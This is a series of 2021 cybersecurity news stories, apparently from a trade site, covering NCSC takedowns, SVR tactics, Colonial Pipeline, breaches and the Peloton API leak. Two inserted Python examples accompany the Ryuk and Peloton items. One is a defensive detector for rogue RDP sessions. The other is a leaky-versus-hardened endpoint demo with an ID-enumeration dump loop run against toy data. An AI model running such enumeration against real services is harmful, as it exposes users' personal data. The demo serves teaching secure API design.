The UK authorities took down over 700,000 malicious and phishing sites last year, a huge increase from 2019, according to the National Cyber Security Centre (NCSC).
The GCHQ body revealed the figures in its annual Active Cyber Defence (ACD) report. ACD is the NCSC’s four-year-old strategy to protect the public sector and, where possible, a broader audience.
It does so via a toolkit of around 14 initiatives, headed by the Takedown Service, which involves finding and removing malicious websites from the internet.
As well as 700,000+ websites, the service removed 1.4 million malicious URLs. Although COVID-19 scams surged in 2020, the NCSC said that the 15-fold increase in the volume of sites taken down was due to an expansion of the service, which saw it invest in a wider set of measures to address “different categories of campaigns.”
Among the institutions protected by the ACD last year was the NHS. The NCSC claimed to have detected and blocked 122 phishing campaigns spoofing the health service, up from just 36 in 2019. This included fake vaccine lures and over 40 malicious apps masquerading as official titles such as NHS Test and Trace in third-party app stores.
Also spoofed was the TV Licensing agency, which was hit by a surge of scam emails in July 2020 when entitlements for pensioners changed, and tax office the HMRC, which was the most phished brand last year.
Overall, more than 11,000 government-themed phishing campaigns were taken down — more than double the 2019 figure.
Meanwhile, the Suspicious Email Reporting Service, only launched in April 2020, received nearly four million reports by the end of the year, leading to the removal of over 26,000 scams not previously identified by the Takedown Service.
NCSC technical director, Ian Levy, said the ACD was made possible through partnerships at home and abroad.
“This has never been more important than in the last year, where it was vital for us to do everything we could to protect our most critical services and the wider public during the pandemic,” he added.
“The bold defensive approach taken by the ACD program continues to ensure our national resilience and so I urge public bodies, companies and the general public to sign up to the services available to help everyone stay safe online.”
The full ACD report is available to read here.
The US and UK governments have released new information on the current tactics of Russian cyber-spies, including 11 vulnerabilities dating back to 2018 that are being used for initial access.
The new report, Further TTPs associated with SVR cyber actors, was released by the UK’s National Cyber Security Centre (NCSC) and the US Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency and FBI.
It updates readers on the activities of the Russian Foreign Intelligence Service (SVR) — also known as APT29, Cozy Bear, and The Dukes — blamed for the recent SolarWinds attacks and many other espionage campaigns.
In a classic cat-and-mouse game, the SVR appears to have recently changed its tactics in response to a previous report issued by the US and UK, in an attempt to stay hidden.
This includes exploitation of widely reported Microsoft Exchange Server bugs, they claimed.
The report also listed 11 flaws in products from Fortinet, Cisco, Oracle, Zimbra, Pulse Secure, Citrix, Elasticsearch, VMware and F5 which are being exploited by the SVR to gain access to victim networks.
“This list should not be treated as exhaustive,” the report warned.
“The group will look to rapidly exploit recently released public vulnerabilities which are likely to enable initial access to their targets.”
The government report also flagged the SVR’s use of legitimate tool Cobalt Strike, as well as a custom backdoor (GoldMax), downloader (Sibot), HTTP tracer tool (GoldFinder), and open source Red Team command and control framework (Sliver), in post-compromise activity.
Organizations should be particularly careful to protect their administrator mailboxes as these are a common target for SVR attackers, who use access to better understand the victim’s network and to obtain further privileges and credentials for persistence and lateral movement.
Gurucul CEO, Saryu Nayyar, argued that as long as unpatched systems remain openly accessible, attacks will continue.
“The payloads may change depending on what the threat actor is after, but attackers will continue to leverage vulnerabilities in web servers, routers and virtualization software until there aren't any vulnerable hosts to exploit,” she added.
“This series of attacks is a reminder of how important it is to patch security vulnerabilities, and to make sure the network is protected with an up-to-date security stack.”
The US government has been forced to issue emergency legislation after a ransomware attack knocked offline the country’s largest fuel pipeline.
Colonial Pipeline confirmed over the weekend that it had suffered a serious cyber-attack.
“Quickly after learning of the attack, Colonial proactively took certain systems offline to contain the threat. These actions temporarily halted all pipeline operations and affected some of our IT systems, which we are actively in the process of restoring,” it said in an update on Sunday.
“While our mainlines (Lines 1, 2, 3 and 4) remain offline, some smaller lateral lines between terminals and delivery points are now operational. We are in the process of restoring service to other laterals and will bring our full system back online only when we believe it is safe to do so, and in full compliance with the approval of all federal regulations.”
The government legislation is designed to relax rules restricting the transportation of fuel by road.
However, if the outage persists there are likely to be shortages and price rises across the 12 states the pipeline travels through and beyond. Reports suggest it carries 2.5 million barrels a day, representing nearly half of the East Coast’s supply of diesel, gasoline and jet fuel.
According to the BBC, the attack was launched by the Russian-speaking DarkSide group, who claim to have also stolen 100GB of data in a classic “double extortion” play.
“Being able to take systems offline and begin a process of restoration is undeniably important, but there is an additional threat if this data is exposed. It underlines the importance of international collaboration to bring down these highly coordinated groups early in their development if we want to protect our critical services,” argued Nominet government cybersecurity expert, Steve Forbes.
“As we watch the domino effect of this cyber-attack, it is very apparent that impact is not limited to systems and software — victims will come in all shapes and sizes, from industries to individuals.”
Three Maryland residents are suspected of being involved in dating and business email compromise (BEC) scams that defrauded victims out of more than $2.3m.
An indictment returned in March by a federal grand jury and unsealed yesterday charges 37-year-old Baltimore resident Noel Chimezuru Agoha, 34-year-old Sessieu Ange Oulai of Parkville, and 32-year-old Essex resident Kelechi Arthur Ntibunka with conspiracy to commit wire fraud, conspiracy to commit money laundering, and aggravated identity theft.
Court documents allege that from August 2016 to December 2018, the three defendants conspired with others to execute a BEC scam in which Agoha, Oulai, and Ntibunka sent deceptive emails and made fraudulent phone calls to victim businesses.
In the communications, the defendants allegedly tried to induce money from their victims by posing as clients or representatives of companies with whom the victims had ongoing business.
"The parties being impersonated were also victimized by the BEC scam because the object of the fraud was to intercept payments intended for these parties and/or to deprive these parties of money to which they were entitled," stated the Department of Justice.
Bank accounts known as drop accounts were allegedly opened by Agoha, Oulai, and Ntibunka and their co-conspirators to receive money sent by the victims and monitored by the defendants. Details of deposits, transfers, and balances were allegedly relayed to their conspirators by the defendants over text messages.
The indictment alleges that the defendants and their co-conspirators received, or attempted to receive, more than $1.1m in proceeds from BEC scams.
Agoha is further accused of conspiring with others to run an online dating scam from May 2016 to July 2018. Victims were tricked into believing that they were in a real romantic relationship by scammers who then claimed they were in financial hardship and asked for money.
Through this ruse, Agoha and their co-conspirators allegedly accrued more than $1.2m.
Agoha and Ntibunka were arrested on May 5 and taken before US Magistrate Judge Beth Gesner, who ordered that they be detained pending a hearing scheduled for May 12. Oulai was already in custody over unrelated state charges when the indictment was unsealed.
A federal lawsuit has been filed against Pennsylvania and a vendor contracted by the state's Department of Health (DOH) over a data breach that exposed the personal health information (PHI) of thousands of Pennsylvanians.
The DOH hired Atlanta-based company Insight Global in 2020 "to provide contact tracing and other similar services" following the outbreak of COVID-19. The Department later said that employees of the company caused a data breach by creating "unauthorized documents outside of the secure data systems created by the Commonwealth."
Information exposed in the data breach included names, phone numbers, and medical information belonging to 72,000 individuals.
The data breach was first reported by WPXI TV show Target 11 on April 30 after the show's team learned of the incident via a whistleblower. The show's investigator Rick Earle today reported that a lawsuit has been filed over the breach.
Insight Global and the Pennsylvania Department of Health are named as defendants in the suit, which claims that data breach victims now face an increased risk of identity theft.
The plaintiffs allege that the data breach was a “direct result of Defendants’ failure to implement adequate and reasonable cybersecurity procedures and protocols."
In the suit, Insight Global is accused of maintaining “unsecure spreadsheets, databases and or documents containing the PHI (public health information).”
In a statement by the company sent to Earle, Insight Global claimed to be unaware of any litigation regarding the data breach.
“Insight Global has not been served with the lawsuit and will need time to analyze any allegations, but can say that we are working closely with the Pennsylvania Department of Health to identify any individuals whose information may have been affected and have taken steps to secure and prevent any further access to, or disclosure of, information," stated the company.
The DOH has stated that it will not be renewing its contract with Insight Global after it expires on July 31. State representatives meeting in Harrisburg on Monday reportedly called for the contract to be terminated immediately and for an investigation into the breach to be launched by a state House Oversight Committee.
Mitigating bot attacks is a major concern for security leaders, according to new research published yesterday by cybersecurity company Human (formerly White Ops).
In the first quarter of 2021, ESG asked 425 cybersecurity and IT decision makers with application security knowledge and responsibilities for their organizations about their perceptions of and responses to bot attacks.
Leaders expressed concerns that bots could cause site slowdowns by overwhelming traffic, new account fraud, credential cracking/brute force attacks, account takeover, content manipulation, sensitive content scraping, and inventory exhaustion and cart abandonment.
Among the report's key findings are that nearly half of respondents believed their organization would be susceptible to a sophisticated bot attack.
Most of those surveyed (90%) said that they viewed bot management as a top-five cybersecurity priority. This finding aligns with security leaders' view of how sophisticated bots are, as 86% of respondents said they believed most bots are capable of circumventing simple bot mitigation features.
“This research demonstrates how crucial a robust bot mitigation platform is to a strong cybersecurity posture,” said Tamer Hassan, co-founder and CEO of HUMAN.
“Sophisticated bots can have immense detrimental effects to customer experience, and the time it takes to rebuild trust with customers is time that today’s organizations don’t have.”
The impact of bot attacks upon those surveyed was significant, with 37% of respondents confirming that they had been victimized by sophisticated bots in the past twelve months. Another 30% believed they had suffered a bot attack but were unable to confirm it.
Senior analyst at ESG, John Grady, said bot attacks were on the rise.
“As organizations have shifted to more online-focused business operations, a trend further accelerated by the pandemic, attackers have doubled down on their efforts and increased the frequency of bot-driven fraud and logic abuse,” said Grady.
“This new research explores how application security leaders perceive the threat of bot attacks and what their plans are for combatting them.”
The UK’s National Cyber Security Centre (NCSC) has published a set of security principles to underpin the development of so-called smart cities.
Titled Connected Places Cyber Security Principles, the guidance aims to help local authorities in the UK embrace the benefits of connected places, while at the same time ensure they are resilient to cyber-attacks.
The smart city concept involves the use of connected technology, such as IoT devices, to collect data and enhance services within a built environment. Examples of smart city technologies include the use of parking sensors to provide real-time data on space availability and sensors to monitor pollution levels.
Despite these benefits, security experts believe smart cities will be heavily targeted by cyber-criminals via methods such as ransomware as a result of the critical public functions they will perform and the numerous security vulnerabilities that are associated with IoT devices.
The guidance outlines the high-level security requirements and principles that should be considered and implemented in the development of smart city technology. These include advising local authorities to think about the cybersecurity governance and skills they will need and the role of third-party suppliers in the process. The NCSC also sets out how connected environments can be designed in a way that is resilient and scalable, and able to protect data.
Dr. Ian Levy, technical director at the NCSC, stated: “Local authorities are using sensors and intelligent systems to improve our lives and make our cities more efficient and environmentally friendly.
“While these benefits should be embraced, it’s important to take steps now to reduce the risk of cyber-attacks and their potentially serious impact on these interconnected networks. I urge every individual and organisation establishing a connected place in the UK to consult our newly published cybersecurity principles.
“It’s our collective responsibility to ensure that our cities of the future are safe and resilient.”
Commenting, Mark Jackson, national cybersecurity advisor, Cisco UK and Ireland, outlined how the publication is part of a broad strategy to enhance the security of IoT technology in general: “Cities and metropolitan districts across the UK are at the point of turning their smart city strategies into actionable plans—with many having already conducted proof of concepts or successful trials. The complexity of the smart cities marketplace, with multiple device manufacturers and IT providers in play, could quite easily present cybersecurity issues that undermine these efforts. The NCSC's principles are one of the most sophisticated pieces of government-led guidance published in Europe to date.
“The guidance set out for connected places generally aligns to cybersecurity best practice for enterprise environments, but also accounts for the challenges of connecting up different systems within our national critical infrastructure. With the DCMS also planning to implement legislation around smart device security, this is indicative of a broader government strategy to level up IoT security across the board.”
Millions of households could be at risk of cyber-attack because they’re running outdated and unpatched routers, a new investigation has found.
Unprotected routers are an increasingly popular target for attackers, theoretically enabling them to hijack smart home devices and eavesdrop on communications and web browsing.
Consumer rights group Which surveyed more than 6000 UK adults back in December to find out which router models they were using.
Extrapolating this data, it calculated that as many as 7.5 million households may be running routers with security issues.
After selecting some of the most common devices, it enlisted the help of Red Maple Technologies to test them, and discovered issues with more than half, from ISPs including Virgin, Sky, TalkTalk, EE and Vodafone.
One of the most common issues was a lack of firmware updates, leaving the devices potentially exposed to exploitation. Which claimed most of the models it tested hadn’t been updated since 2018, and some since 2016 — affecting an estimated six million users.
Another problem is weak default passwords which are easy to guess, allowing remote attackers to potentially hijack devices.
The researchers also discovered local network vulnerabilities, although these require an attacker to be within Wi-Fi range to exploit.
Which said not all old routers are inherently insecure, as long as they don’t allow weak default passwords and have regular firmware updates. However, it urged consumers to check and change any weak passwords and to request a new model if theirs is no longer receiving updates.
Tripwire VP of product management and strategy, Tim Erlin, argued that most modern connected devices will automatically update.
“The situation with updating connected devices in consumers’ homes has changed fairly dramatically and rapidly. It wasn’t long ago that the idea of a device automatically updating without the user’s knowledge was considered problematic, whereas now it’s a basic expectation,” he added.
“That rapid shift has left a sizable security gap in terms of deployed devices that don’t auto-update. Unfortunately, it’s likely that gap won’t be closed until those devices are simply replaced.”
An organization involved in COVID-19 research lost a week’s worth of critical data after a Ryuk attack which used a stolen password, according to Sophos.
Cybersecurity vendor Sophos revealed the case yesterday as a cautionary tale of what can happen when organizations don’t follow security best practice.
The problem was traced back to one of the university students that the European research institute collaborates with as part of its outreach programs.
That student obtained what they thought was a 'cracked' version of a data visualization tool they needed; in reality it contained information-stealing malware. The individual apparently disabled Windows Defender and their PC firewall after the security tool raised a malware alert before the download.
The malware harvested keystrokes and stole browser data, cookies, clipboard contents and, it transpired, the student’s log-ins for the research institute.
“Thirteen days later a remote desktop protocol (RDP) connection was registered on the institute’s network using the student’s credentials,” Sophos explained.
“A feature of RDP is that a connection also triggers the automatic installation of a printer driver, enabling users to print documents remotely. This allowed the Rapid Response investigation team to see that the registered RDP connection involved a Russian language printer driver and was likely to be a rogue connection. Ten days after this connection was made, the Ryuk ransomware was launched.”
Although the unnamed biomolecular specialist had back-ups, they were not fully up-to-date, meaning that a week’s worth of vital research was lost. The firm also suffered a significant operational cost, as all computer and server files had to be rebuilt from the ground up before data could be restored, the security vendor said.
“It is unlikely that the operators behind the ‘pirated software’ malware are the same as the ones who launched the Ryuk attack,” said Peter Mackenzie, manager of Rapid Response at Sophos.
“The underground market for previously compromised networks offering attackers easy initial access is thriving, so we believe that the malware operators sold their access on to another attacker. The RDP connection could have been the access brokers testing their access.”
Sophos recommended organizations deploy multi-factor authentication (MFA) for access to any internal networks, especially from third-parties, keep software regularly updated, segment networks and restrict account privileges.
It also urged customers to lock down RDP access with static Local Area Network (LAN) rules, via a group policy or using access control lists.
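The rogue RDP session Sophos describes leaves two correlatable artefacts: a remote-interactive logon using a third-party account, and a printer driver installed in an unexpected language moments later. The detection logic below is an added example, not code from the article or from Sophos; it runs over constructed sample records in a simplified format, and the field names, the set of external accounts, the expected locales and the internal address range are all assumptions.

```python
"""Correlate RDP logons with printer-driver installs to flag likely rogue sessions.

Added example (not from the original article or Sophos). It assumes a
simplified, constructed log format: each record is a dict with an "event",
an ISO 8601 "time" and event-specific fields. On a real Windows host the
equivalent signals would be a Security logon event with logon type 10
(RemoteInteractive) and a PrintService driver-added event; the field names
used here are assumptions, not Windows schema.
"""
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry).
SAMPLE_LOGS = [
    {"event": "logon", "time": "2021-03-01T02:14:07", "user": "student01",
     "logon_type": 10, "src_ip": "203.0.113.45", "session": "S-1"},
    {"event": "printer_driver_added", "time": "2021-03-01T02:14:20",
     "session": "S-1", "driver": "Microsoft Print To PDF", "lang": "ru-RU"},
    {"event": "logon", "time": "2021-03-01T09:02:11", "user": "alice",
     "logon_type": 10, "src_ip": "10.0.5.20", "session": "S-2"},
    {"event": "printer_driver_added", "time": "2021-03-01T09:02:30",
     "session": "S-2", "driver": "HP Universal Printing PCL 6", "lang": "en-GB"},
    {"event": "logon", "time": "2021-03-01T10:00:00", "user": "bob",
     "logon_type": 2, "src_ip": "10.0.5.21", "session": "S-3"},
]

# Policy inputs (assumptions): accounts belonging to external collaborators
# such as the student in the Sophos case, the locales the institute expects
# to see on printer drivers, and the address ranges RDP should originate from.
EXTERNAL_ACCOUNTS = {"student01"}
EXPECTED_LANGS = {"en-GB", "en-US"}
INTERNAL_NETS = ("10.",)          # only 10/8 is treated as internal here
WINDOW = timedelta(minutes=5)     # driver install must follow the logon closely


def parse_time(stamp):
    return datetime.fromisoformat(stamp)


def rdp_logons(logs):
    """Logon type 10 is a remote-interactive (RDP) logon."""
    return [r for r in logs if r["event"] == "logon" and r["logon_type"] == 10]


def driver_installs_for(session, logs):
    return [r for r in logs
            if r["event"] == "printer_driver_added" and r["session"] == session]


def score_session(logon, logs):
    """Return the list of reasons an RDP session looks suspicious (empty if none)."""
    reasons = []
    if logon["user"] in EXTERNAL_ACCOUNTS:
        reasons.append("external collaborator account used for RDP")
    if not logon["src_ip"].startswith(INTERNAL_NETS):
        reasons.append("RDP source outside internal range")
    t0 = parse_time(logon["time"])
    for drv in driver_installs_for(logon["session"], logs):
        installed_soon_after = abs(parse_time(drv["time"]) - t0) <= WINDOW
        if installed_soon_after and drv["lang"] not in EXPECTED_LANGS:
            reasons.append(f"printer driver installed with unexpected locale {drv['lang']}")
    return reasons


def find_suspicious_rdp(logs):
    """Map session id -> reasons for every RDP session that trips at least one rule."""
    findings = {}
    for logon in rdp_logons(logs):
        reasons = score_session(logon, logs)
        if reasons:
            findings[logon["session"]] = reasons
    return findings


if __name__ == "__main__":
    for session, reasons in find_suspicious_rdp(SAMPLE_LOGS).items():
        print(session, "->", "; ".join(reasons))
```

On the constructed sample only session S-1 is flagged, on all three rules; an alert on any single rule would still be worth a look, but the combination is what makes the session stand out.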
A team at AV reviews site SafetyDetectives found the China-based Elasticsearch server exposed online without any password protection or encryption.
The 7GB trove contained over 13 million records including the email addresses and WhatsApp/Telegram phone numbers of vendor contacts, plus email addresses, surnames, PayPal account details and Amazon account profiles of reviewers.
According to SafetyDetectives, fake review scams typically begin with vendors sending their reviewer contacts a list of products for which they would like a five-star review.
After leaving the review and sending the vendor a link, the reviewer will be paid via PayPal to compensate them for the product purchase and will be allowed to keep the product itself as payment. The reviews site claimed that the leak implicated around 200,000 individuals in such schemes.
The SafetyDetectives team discovered the database on March 1 and it was secured around a week later, although the researchers weren’t able to track down its owner.
“Given the extent of the records and vendors included in the database, it’s possible that the server is not owned by the Amazon vendors running the scam. The server could be owned by a third party that reaches out to potential reviewers on behalf of the vendors,” it explained.
“Third parties might post a picture of the product in a Facebook or WeChat group, asking for reviews in return for free products. The server could also be owned by a large company with several subsidiaries, which would explain the presence of multiple vendors. What’s clear is that whoever owns the server could be subject to punishments from consumer protection laws, and whoever is paying for these fake reviews may face sanctions for breaking Amazon’s terms of service.”
There’s also a potential data security and identity fraud risk for those whose information was exposed in the privacy snafu, SafetyDetectives warned.
The United States has imprisoned a man who continued to cyber-stalk his ex-wife and kids after they moved states and changed their names to evade him.
The determined Oscar Adrian Marquez tracked his former wife, Jennifer Lorraine, and two daughters from New Mexico to Oregon, harassing them even after they purchased guns and took out a protection order against him.
Following a three-day trial in November 2020, 47-year-old Marquez was convicted of stalking, cyberstalking, and three counts of interstate violation of a protective order.
During his trial, the jury were played a song recorded by Marquez. The ditty—named "I only need one bullet"—detailed how one bullet would be sufficient "to settle the score" with the person who "took my kids, my money, my life, when you walked out that door."
On the stand at trial, Marquez suggested that the bullet he was singing about would be used against himself.
The Marquezes' marriage broke down in 2014 after what his wife described as years of physical and emotional abuse. That summer, Marquez kidnapped his children in the middle of the night. After being missing for a week, they were found in El Paso.
Lorraine reported his abuse and the kidnapping to the FBI, but that didn't stop Marquez from threatening to kill his ex-wife and her family and threatening them via voicemail and social media.
In 2017, Lorraine moved her family to Portland, Oregon, where she contacted the Oregon Crime Victims Law Center to keep their home address confidential and registered her protective order in the state's courts.
Lorraine then bought mace, a Taser, guns, and a guard dog and installed an alarm and camera system in her home together with a silent 911 button.
Marquez left a note at Lorraine's mother's house, stating that he was going to find her daughter. On July 16, 2019, he posted his ex-wife’s new name and home address in Portland on social media.
Thirteen days later, Marquez was arrested as he drove past his ex-wife's new residence for a third time.
US District Judge Michael Mosman described Marquez as “unusually unhinged” and "unusually" obsessed with his victims before sentencing him on May 3 to ten years in prison.
At least three American healthcare providers have suffered a data breach after a cyber-attack on an administrative services company in Texas.
CaptureRx, which is based in San Antonio, fell victim to a ransomware attack on February 6. On February 19, an investigation into the attack determined that certain files had been accessed without authorization.
During the attack, cyber-criminals exfiltrated files containing the personal health information (PHI) of more than 24,000 individuals.
CaptureRx serves the Mohawk Valley Health System affiliate Faxton St. Luke’s Healthcare in New York, Thrifty Drug Stores (Thrifty White), and Gifford Health Care of Randolph, Vermont, among others.
A review of the attack, completed on March 19, determined that the security breach impacted 17,655 patients of Faxton St. Luke's Healthcare and a further 6,777 patients at Gifford Health Care. The number of Thrifty Drug Store patients affected by the attack has not yet been determined.
HIPAA Journal reports that CaptureRx is currently unclear how many of its healthcare provider clients have been affected by the attack. Nor has the company finished its final tally of how many individuals had their PHI exposed because of the incident.
Data exposed and stolen by the ransomware attackers included names, dates of birth, prescription information, and, for a limited number of patients, medical record numbers.
Affected healthcare provider clients were notified of the incident by CaptureRx between March 30 and April 7.
WKTV reports that 100 patients of Faxton St. Luke's Healthcare were not notified of the data breach because CaptureRx was unable to verify a valid mailing address for them.
The company said no evidence has been found to suggest that the data stolen in the attack has been misused. Impacted individuals have been advised to closely monitor their bank accounts for any incidences of fraudulent activity.
"Data privacy and security are among CaptureRx’s highest priorities, and there are extensive measures in place to protect information in CaptureRx’s care," stated CaptureRx.
"As part of CaptureRx’s ongoing commitment to the security of information, all policies and procedures are being reviewed and enhanced and additional workforce training is being conducted to reduce the likelihood of a similar event in the future."
The United States Department of Defense (DOD) has expanded its ethical hacking program to include more targets.
DoD officials announced yesterday that the Department's Vulnerability Disclosure Program will be broadened to include all publicly accessible DOD information systems.
Bug hunters were first invited to engage with the DOD in 2016 when the initiative 'Hack the Pentagon' was launched. Through this initiative, the Defense Digital Service set up a bug bounty program to reward ethical hackers for identifying flaws in the Department's digital defenses.
Director of the Defense Digital Service Brett Goldstein said that before the initiative was introduced, ethical hackers who discovered a vulnerability had no way of communicating their findings to the DOD.
"Because of this, many vulnerabilities went unreported," said Goldstein.
He added: "The DOD Vulnerability Policy launched in 2016 because we demonstrated the efficacy of working with the hacker community and even hiring hackers to find and fix vulnerabilities in systems."
When the vulnerability hunting policy was first established, it was limited to DOD public-facing applications and websites.
Goldstein said that the newly announced expansion will allow for research and reporting of vulnerabilities detected in all DOD publicly accessible networks, Internet of Things, industrial control systems, frequency-based communication, and more.
"This expansion is a testament to transforming the government's approach to security and leapfrogging the current state of technology within DOD," said the director.
The expanded Vulnerability Disclosure program will continue to be overseen by the DOD's Cyber Crime Center. Growing it to catch more vulnerabilities and improve cybersecurity was an obvious and sensible progression, according to program director Kristopher Johnson.
He said: "The department has always maintained the perspective that DOD websites were only the beginning as they account for a fraction of our overall attack surface."
Ethical hackers have submitted more than 29,000 vulnerability reports through the Vulnerability Disclosure Program since it was launched. Johnson said that over 70% of those reported weaknesses proved to be valid.
The program director said that he expects the number of disclosures reported by the security researcher community to increase significantly with the expansion of the program, which was last extended in 2018.
Financial services and insurance organizations experienced a 125% rise in exposure to mobile phishing attacks in 2020 compared to 2019, according to Lookout’s Financial Services Threat Report.
The cloud security firm also found that malware and app risk exposure went up by more than 400% on average per quarter last year among the industry’s employees and customers. This was despite a 50% growth in mobile device management deployment during this period.
This surge in exposure to risk has come as cyber-criminals have deliberately ramped up their targeting of phones, tablets, and Chromebooks to try to exploit vulnerabilities. Lookout noted that even a single successful phishing or mobile ransomware attack can enable access to highly sensitive data in this industry, including proprietary market research, client financials, and investment strategies.
Another finding from the study, which looked at telemetry data from nearly 200 million mobile devices and 140 million apps, was that almost 50% of phishing attempts sought to steal corporate login credentials.
Particularly concerning was that close to 20% of mobile banking customers had a trojanized app on their device when trying to sign in to their account.
Additionally, Lookout revealed the extent to which delays in installing the latest software updates for mobiles expose users to significant cyber-risks. More than a fifth (21%) of iOS and around a third (32%) of Android devices were exposed to more than 390 iOS and 1060 Android vulnerabilities, respectively, due to running iOS 13 or earlier and Android 10 or earlier.
Gert-Jan Schenk, chief revenue officer, Lookout, commented: "These findings demonstrate that regardless of whether a device is managed or unmanaged, attackers have equal success in deploying phishing campaigns.
“In addition, phishing can be particularly difficult to detect on a mobile device. We inherently trust these devices, which makes us vulnerable to social engineering attacks. Protecting modern endpoints requires a different approach—one that is built from the ground up for mobile and can continuously secure an organization’s data from endpoint to the cloud.”
Data breach incidents reported to the UK’s financial regulator dropped by nearly a third from 2019 to 2020, although experts claim this is far from an accurate picture of the current threat landscape.
However, the data received, showing a 30% year-on-year drop in reported breaches to just 76 in 2020, was at odds with Kroll’s own figures, which showed a 56% average increase in incidents over the same period across all sectors, with the financial services sector slightly higher still.
Given the pandemic has provided even more opportunities for threat actors to target organizations distracted by remote working, the figures are doubly puzzling.
Kroll argued that the disparity could be explained by more organizations pulling back, after an initial period of over-reporting following the introduction of the GDPR.
In many cases, legal counsel is advising firms not to notify if they believe the reporting threshold, whether data subjects were “harmed”, has not been met, it said.
“The GDPR is still a relatively new and complex piece of legislation and we certainly saw businesses being hyper-vigilant when it came to reporting to the ICO and the FCA in its initial stages of implementation,” explained Keily Blair, head of Orrick, Herrington & Sutcliffe’s UK Cyber, Privacy and Data Innovation team.
“The drop in the FCA numbers likely reflects that organizations are becoming more adept at assessing whether an incident truly meets the necessary thresholds to trigger a report to the FCA.”
She argued that the FCA’s official figures are likely to represent the tip of the iceberg in terms of security breaches at financial services firms.
“The worry is that by seeing these figures, without the benefit of knowing what is happening below the surface, organizations may misinterpret the true nature and extent of the cybersecurity threat leading to complacency and greater risk,” she warned.
Across Europe and across all sectors, year-on-year breach notifications increased by 19% in 2020, according to DLA Piper.
A security researcher has discovered several issues with the software used by exercise equipment maker Peloton, which may have leaked sensitive customer information to unauthenticated users.
Pen Test Partners explained in a new blog post that the problem could be traced back to unauthenticated API endpoints, which could have allowed hackers to interrogate information on all users.
Among the potentially exposed data was user and instructor IDs, group membership, location, workout stats, gender and age, and whether users are in the studio or not.
“The mobile, web application and back-end APIs had several endpoints that revealed users’ information to both authenticated and unauthenticated users,” the security consultancy said.
“A full investigation should be conducted by Peloton to improve their security, especially now that famous individuals are openly using this service.”
The flaws were so bad that they leaked information even for users in privacy mode, Pen Test Partners claimed.
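The pattern described above, an endpoint that returns a full user record without checking who is asking, is easy to see in code. The following is an added example written for this page, not Peloton's code or Pen Test Partners' findings: the user store, field names, user IDs and the "privacy mode" policy are all constructed. It places the leaky handler beside a hardened one that authenticates first and then decides per field what the caller may see, and includes the enumeration loop an attacker would run against each.

```python
"""Added example (not Peloton's code): a profile endpoint that leaks user
data to unauthenticated callers, beside a hardened version that enforces
authentication and per-user visibility, including a 'privacy mode' flag.
All users, IDs, field names and policy below are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class User:
    user_id: int
    username: str
    age: int
    gender: str
    location: str
    workouts: int
    private: bool = False                         # "privacy mode" switched on
    followers: set = field(default_factory=set)   # user IDs allowed to see a private profile


# Constructed sample store; a real service would read from a database.
USERS = {
    1: User(1, "rider_one", 41, "F", "London", 312),
    2: User(2, "quiet_rider", 55, "M", "Wilmington", 1200, private=True, followers={3}),
    3: User(3, "coach_ana", 30, "F", "New York", 58),
}

PUBLIC_FIELDS = ("user_id", "username")
SENSITIVE_FIELDS = ("age", "gender", "location", "workouts")


def leaky_get_user(store, user_id: int, session_user_id: Optional[int] = None):
    """Vulnerable: the session is never consulted and every field is returned,
    so an unauthenticated caller can walk user_id=1,2,3,... and dump all users,
    privacy mode included."""
    u = store.get(user_id)
    if u is None:
        return 404, None
    return 200, {f: getattr(u, f) for f in PUBLIC_FIELDS + SENSITIVE_FIELDS}


def hardened_get_user(store, user_id: int, session_user_id: Optional[int]):
    """Authenticate first, then decide per field what this caller may see."""
    # 1. Authentication: no valid session, no data at all (not even existence).
    if session_user_id is None or session_user_id not in store:
        return 401, None
    u = store.get(user_id)
    if u is None:
        return 404, None
    # 2. Authorization: the owner, followers of a private account, or anyone
    #    for a public account get the sensitive fields; everyone else gets
    #    only the public ones. The UI hiding a field is not enough; the API
    #    itself has to enforce it.
    may_see_details = (
        session_user_id == u.user_id
        or not u.private
        or session_user_id in u.followers
    )
    body = {f: getattr(u, f) for f in PUBLIC_FIELDS}
    if may_see_details:
        body.update({f: getattr(u, f) for f in SENSITIVE_FIELDS})
    return 200, body


def dump_all(store, handler, session_user_id: Optional[int] = None, max_id: int = 10_000):
    """An attacker's enumeration loop: collect every record the handler
    returns with status 200. Stops at the first 401, since the hardened
    endpoint refuses every request without a session."""
    out = []
    for uid in range(1, max_id + 1):
        status, body = handler(store, uid, session_user_id)
        if status == 401:
            break
        if status == 200:
            out.append(body)
    return out


if __name__ == "__main__":
    print("leaky, no session:", dump_all(USERS, leaky_get_user))
    print("hardened, no session:", dump_all(USERS, hardened_get_user))
    print("hardened, as user 1:", dump_all(USERS, hardened_get_user, session_user_id=1))
```

Against the leaky handler the loop recovers every record, including the private user's location and workout count; against the hardened one it gets nothing without a session and, as an ordinary signed-in user, only the public fields of the private account.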
Peloton has become hugely popular during the pandemic as a way for locked-down consumers to keep fit at home. The firm claims to have over three million subscribers, including famous users such as US President Biden, who probably don’t want their workout stats and location made public.
Unfortunately, Peloton initially appeared to make a few mistakes in its handling of the responsible disclosure.
According to Pen Test Partners: “it acknowledged the disclosure, then ignored me and silently ‘fixed’ one of the issues. The ‘fix’ didn’t fix the vulnerability.”
The security firm was forced to reach out to a journalist months after its initial disclosure to try and start a constructive dialog.
“Shortly after contact was made with the press office at Peloton we had contact direct from Peloton’s CISO, who was new in post. The vulnerabilities were largely fixed within seven days,” it concluded.
“It’s a shame that our disclosure wasn’t responded to in a timely manner and also a shame that we had to involve a journalist in order to get listened to.”
Jason Kent, hacker in residence at Cequence Security, argued that 2021 could be the year of the API attack unless organizations find and properly secure all of their API endpoints.
“The leaky Peloton API is just the latest example of how hard it can be for API developers to get authentication just right. In needing to build an API that allows some users to share information and build community, while respecting those who want privacy by ensuring the data is secure, they have risked all user data,” he added.
“The information might not show in the application itself, but developers and security teams need to also confirm that the APIs themselves conform to the security measures in place.”
Half of British manufacturers and even more in the automotive sector suffered a successful cyber-attack last year, but cost remains a major barrier to improvements, according to an industry body.
Make UK, which represents the sector, claimed that the 47% figure overall rose to 62% for carmakers.
Although security has become a bigger priority for 50% of its members since the start of the pandemic, and 61% now have a board director responsible for cyber, 59% cited cost as the biggest barrier to building enhanced cyber protections.
As with organizations in many sectors, the move to mass remote working during the pandemic exposed many manufacturers to an increase in online threats. Make UK claimed the shift to remote production and remote monitoring of equipment, with staff working from home “on hastily supplied laptops” provided new opportunities for hackers to strike.
Manufacturing was the third most frequently targeted sector for ransomware last year globally, according to Trend Micro.
